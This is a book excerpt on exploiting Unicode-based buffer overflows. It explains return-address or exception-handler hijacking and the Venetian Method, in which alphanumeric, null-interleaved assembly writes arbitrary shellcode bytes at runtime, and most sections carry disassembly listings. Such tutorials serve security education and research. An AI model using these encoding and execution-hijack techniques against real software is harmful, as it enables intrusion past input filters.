Flylib.com

Books Software

 
 
 

Exploiting Unicode-Based Vulnerabilities

Exploiting Unicode-Based Vulnerabilities

In order to exploit a Unicode-based buffer overflow, we first need a mechanism to transfer the process's path of execution to the user -supplied buffer. By the very nature of the vulnerability, an exploit will overwrite the saved return address or the exception handler with a Unicode value. For example, if our buffer can be found at address 0x00310004 , then we'd overwrite the saved return address/exception handler with 0x00310004 . If one of the registers contains the address of the user-supplied buffer (and if you're very lucky), you may be able to find a "jmp register" or "call register" opcode at or near a Unicode-style address. For example, if the EBX register points to the user-supplied buffer, then you may find a jmp ebx instruction perhaps at address 0x00770058 . If you have even more luck, you may also get away with having a jmp or call ebx instruction above a Unicode-form address. Consider the following code:

0x007700FF     inc ecx
   0x00770100     push ecx
   0x00770101     call ebx

We'd overwrite the saved return address/exception handler with 0x007700FF , and execution would transfer to this address. When execution takes up at this point, the ECX register is incremented by 1 and pushed onto the stack, and then the address pointed to by EBX is called. Execution would then continue in the user-supplied buffer. This is a one in a million likelihood ”but it's worth bearing in mind. If there's nothing in the code that will cause an access violation before the call/jmp register instruction, then it's definitely useable.

Assuming you do find a way to return to the user-supplied buffer, the next thing you need is either a register that contains the address of somewhere in the buffer, or you need to know an address in advance. The Venetian Method uses this address when it creates the shellcode on the fly. We'll later discuss how to get the fix on the address of the buffer.

The Available Instruction Set in Unicode Exploits

When exploiting a Unicode-based vulnerability, the arbitrary code executed must be of a form in which each second byte is a null and the other is non-null. This obviously makes for a limited set of instructions available to you. Instructions available to the Unicode exploit developer are all those single-byte operations that include such instructions as push , pop , inc , and dec . Also available are the instructions with a byte form of

nn00nn

such as:

mul eax, dword ptr[eax],0x00nn

Alternatively, you may find

{% if main.adsdop %}{% include 'adsenceinline.tpl' %}{% endif %}
nn00nn00nn

such as:

imul eax, dword ptr[eax],0x00nn00nn

Or, you could find many add-based instructions of the form

00nn00

where two single-byte instructions are used one after the other, as in this code fragment:

00401066 50                   push        eax
00401067 59                   pop         ecx

The instructions must be separated with a nop -equivalent of the form 00 nn 00 to make it Unicode in nature. One such choice could be:

00401067 00 6D 00             add         byte ptr [ebp],ch

Of course, for this method to succeed, the address pointed to by EBP must be writable. If it isn't, choose another; we've listed many more later in this section. When embedded between the push and the pop we get:

00401066 50                   push        eax
00401067 00 6D 00             add         byte ptr [ebp],ch
0040106A 59                   pop         ecx

These are Unicode in nature:

\x50\x00\x6D\x00\x59

The Venetian Method

Writing a full-featured exploit using such a limited instruction set is extremely difficult, to say the least. So what can be done to make the task easier? Well, you could use the limited set of available instructions to create the real exploit code on the fly, as is done using the Venetian technique described in Chris Anley's paper. This method essentially entails an exploit that uses an "exploit writer" and a buffer with half the real exploit already in it. This buffer is the destination that the real exploit code will eventually reach. The exploit writer, written using only the limited instruction set, replaces each null byte in the destination buffer with what it should be in order to create the full-featured real exploit code.

Let's look at an example. Before the exploit writer begins executing, the destination buffer could be:

\x41\x00\x43\x00\x45\x00\x47\x00

When the exploit writer starts, it replaces the first null with 0x42 to give us

\x41\x42\x43\x00\x45\x00\x47\x00

The next null is replaced with 0x44, which results in

\x41\x42\x43\x44\x45\x00\x47\x00

The process is repeated until the final full-featured "real" exploit remains.

\x41\x42\x43\x44\x45\x46\x47\x48

As you can see, it's much like Venetian blinds closing ”hence the name for the technique.

To set each null byte to its appropriate value, the exploit writer needs at least one register that points to the first null byte of the half-filled buffer when it starts its work. Assuming EAX points to the first null byte, it can be set with the following instruction:

00401066 80 00 42             add         byte ptr [eax],42h

Adding 0x42 to 0x00 , needless to say, gives us 0x42 . EAX then must be incremented twice to point to the next null byte; then it too can be filled. But remember, the exploit writer part of the exploit code needs to be Unicode in nature, so it should be padded with nop -equivalents. To write 1 byte of exploit code now requires the following code:

00401066 80 00 42             add         byte ptr [eax],42h
00401069 00 6D 00             add         byte ptr [ebp],ch
0040106C 40                   inc         eax
0040106D 00 6D 00             add         byte ptr [ebp],ch
00401070 40                   inc         eax
00401071 00 6D 00             add         byte ptr [ebp],ch

This is 14 bytes (7 wide characters) of instruction and 2 bytes (1 wide character) of storage, which makes 16 bytes (8 wide characters ) for 2 bytes of real exploit code. One byte is already in the destination buffer; the other is created by the exploit writer on the fly.

Although Chris's code is small (relatively speaking), which is a benefit, the problem is that one of the bytes of code has a value of 0x80 . If the exploit is first sent as an ASCII-based string and then converted to Unicode by the vulnerable process, depending on the code page in use during the conversion routine, this byte may get mangled. In addition, when replacing a null byte with a value greater than 0x7F , the same problem creeps in ”the exploit code may get mangled and thus fail to work. To solve this we need to create an exploit writer that uses only characters 0x20 to 0x7F . An even better solution would be to use only letters and numbers ; punctuation characters sometimes get special treatment and are often stripped, escaped, or converted. We will try our best to avoid these characters to guarantee success.

An ASCII Venetian Implementation

Our task is to develop a Unicode-type exploit that, using the Venetian Method, creates arbitrary code on the fly using only ASCII letters and numbers from the Roman alphabet ”a Roman Exploit Writer, if you will. We have several methods available to us, but many are too inefficient; they use too many bytes to create a single byte of arbitrary shellcode. The method we present here adheres to our requirements and appears to use the least number of bytes for an ASCII equivalent of the original code presented with the Venetian Method. Before getting to the meat of the exploit writer, we need to set certain states. We need ECX to point to the first null byte in the destination buffer, and we need the value 0x01 on top of the stack, 0x39 in the EDX register (in DL specifically ), and 0x69 in the EBX register (in BL specifically). Don't worry if you don't quite understand where these preconditions come from; all will soon become clear. With the nop- equivalents (in this case, add byte ptr [ebp],ch ) removed for the sake of clarity, the setup code is as follows :

0040B55E 6A 00                push        0
0040B560 5B                   pop         ebx
0040B564 43                   inc         ebx
0040B568 53                   push        ebx
0040B56C 54                   push        esp
0040B570 58                   pop         eax
0040B574 6B 00 39             imul        eax,dword ptr [eax],39h
0040B57A 50                   push        eax
0040B57E 5A                   pop         edx
0040B582 54                   push        esp
0040B586 58                   pop         eax
0040B58A 6B 00 69             imul        eax,dword ptr [eax],69h
0040B590 50                   push        eax
0040B594 5B                   pop         ebx

Assuming ECX already contains the pointer to the first null byte (and we'll deal with this aspect later), this piece of code starts by pushing 0x00000000 onto the top of the stack, which is then popped off into the EBX register. EBX now holds the value . We then increment EBX by 1 and push this on to the stack. Next, we push the address of the top of the stack onto the top, then pop into EAX . EAX now holds the memory address of the 1 . We now multiply 1 by 0x39 to give 0x39 , and the result is stored in EAX . This is then pushed onto the stack and pop ped into EDX . EDX now holds the value 0x3 9 ”more important, the value of the low 8-bit DL part of EDX contains 0x39 .

{% if main.adsdop %}{% include 'adsenceinline.tpl' %}{% endif %}

We then push the address of the 1 onto the top of the stack again with the push esp instruction, and again pop it into EAX . EAX contains the memory address of the 1 again. We multiply this 1 by 0x69 , leaving this result in EAX . We then push the result onto the stack and pop it into EBX . EBX / BL now contains the value 0x69 . Both BL and DL will come into play later when we need to write out a byte with a value greater than 0x7F . Moving on to the code that forms the implementation of the Venetian Method, and again with the nop -equivalents removed for clarity, we have:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 41             imul        eax,dword ptr [eax],41h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 41                   inc         ecx
0040B5CC 41                   inc         ecx

Remembering that we have the value 0x00000001 at the top of the stack, we push the address of the 1 onto the stack. We then pop this into EAX, so EAX now contains the address of the 1 . Using the imul operation, we multiply this 1 by the value we want to write out ”in this case, 0x41 . EAX now holds 0x00000041 , and thus AL holds 0x41 . We add this to the byte pointed to by ECX ”remember this is a null byte, and so when we add 0x4 1 to 0x0 0 we're left with 0x41 ”thus closing the first "blind." We then increment ECX twice to point to the next null byte, skipping the non-null byte, and repeat the process until the full code is written out.

Now what happens if you need to write out a byte with a value greater than 0x7F ? We'll this is where BL and DL come into play. What follows are a few variations on the above code that deals with this situation.

Assuming the null byte in question should be replaced with a byte in the range of 0x7F to 0xAF , for example 0x94 ( xchg eax,esp ) we would use the following code:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 5B             imul        eax,dword ptr [eax],5Bh
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi
0040B5C9 00 51 00             add         byte ptr [ecx],dl // <---- HERE
0040B5CC 41                   inc         ecx
0040B5D0 41                   inc         ecx

Notice what is going on here. We first write out the value 0x5B to the null byte and then add the value in DL to it ” 0x39 . 0x39 plus 0x5B is 0x94 . Incidentally, we insert an INC ESI as a nop -equivalent to avoid incrementing ECX too early and adding 0x39 to one of the non-null bytes.

If the null byte to be replaced should have a value in the range of 0xAF to 0xFF , for example, 0xC3 ( ret) , use the following code:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 5A             imul        eax,dword ptr [eax],5Ah
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi
0040B5C9 00 59 00             add         byte ptr [ecx],bl // <---- HERE
0040B5CC 41                   inc         ecx
0040B5D0 41                   inc         ecx

In this case, we're doing the same thing, this time using BL to add 0x69 to where the byte points. This is done by using ECX , which has just been set to 0x5A . 0x5A plus 0x69 equals 0xC3 , and thus we have written out our ret instruction.

What if we need a value in the range of 0x00 to 0x20 ? In this case, we simply overflow the byte. Assuming we want the null byte replaced with 0x06 ( push es ), we'd use this code:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 64             imul        eax,dword ptr [eax],64h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 46                   inc         esi 
0040B5C9 00 59 00             add         byte ptr [ecx],bl       // <--- BL == 0x69
0040B5CC 46                   inc         esi
0040B5CD 00 51 00             add         byte ptr [ecx],dl       // <--- DL == 0x39
0040B5D0 41                   inc         ecx
0040B5D4 41                   inc         ecx

0x60 plus 0x69 plus 0x39 equals 0x106 . But a byte can only hold a maximum value of 0xFF , and so the byte "overflows," leaving 0x06 .

This method can also be used to adjust non-null bytes if they're not in the range 0x20 to 0x7F . What's more, we can be efficient and do something useful with one of the nop -equivalents ”let's use this method and make it non- nop -equivalent. Assuming, for example, that the non-null byte should be 0xC3 ( ret ), initially we would set it to 0x5A . We would make sure to do this before calling the second inc ecx , when setting the null byte, before this non-null byte. We could adjust it as follows:

0040B5BA 54                   push        esp
0040B5BE 58                   pop         eax
0040B5C2 6B 00 41             imul        eax,dword ptr [eax],41h
0040B5C5 00 41 00             add         byte ptr [ecx],al
0040B5C8 41                   inc         ecx                   
// NOW ECX POINTS TO THE 0x5A IN THE DESTINATION BUFFER
0040B5C9 00 59 00             add         byte ptr [ecx],bl     
// <-- BL == 0x69 NON-null BYTE NOW EQUALS 0xC3
0040B5CC 41                   inc         ecx
0040B5CD 00 6D 00             add         byte ptr [ebp],ch

We repeat these actions until our code is complete. We're left then with the question: What code do we really want to execute?